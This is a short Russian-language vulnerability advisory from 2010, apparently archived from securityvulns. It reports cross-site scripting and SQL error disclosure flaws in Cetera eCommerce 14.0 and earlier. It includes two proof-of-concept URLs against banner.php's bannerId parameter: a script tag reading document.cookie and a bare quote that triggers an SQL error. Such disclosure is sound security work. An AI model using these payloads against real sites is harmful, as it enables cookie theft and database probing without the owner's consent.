Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25277
HistoryDec 12, 2010 - 12:00 a.m.

Новые уязвимости в Cetera eCommerce

2010-12-1200:00:00
vulners.com
14

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною новых Cross-Site Scripting
и SQL DB Structure Extraction уязвимостях в Cetera
eCommerce.

XSS (WASC-08):

http://site/cms/templates/banner.php?bannerId=%3Cscript%3Ealert(document.cookie)%3C/script%3E

SQL DB Structure Extraction (WASC-13):

http://site/cms/templates/banner.php?bannerId=’

Уязвимы Cetera eCommerce 14.0 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на
сайте:
http://websecurity.com.ua/4578/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua